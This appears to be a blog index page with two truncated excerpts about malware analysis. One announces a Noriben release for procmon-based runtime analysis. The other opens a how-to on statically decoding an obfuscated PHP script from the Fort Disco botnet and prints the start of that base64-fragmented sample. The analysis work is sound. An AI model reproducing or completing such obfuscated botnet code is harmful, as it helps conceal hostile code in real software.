Noriben version 1.4 released

It’s been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next. Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a …

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below: <? $GLOBALS[‘_584730172_’]=Array(base64_decode(‘ZXJy’ .’b’ .’3JfcmVw’ .’b’ .’3J0aW5n’),base64_decode(‘c’ .’2V0X3RpbWV’ .’fbGl’ .’taXQ’ .’=’),base64_decode(” .’ZG’ .’Vma’ .’W’ .’5l’),base64_decode(” .’ZGlyb’ .’mFtZQ==’),base64_decode(‘ZGVm’ …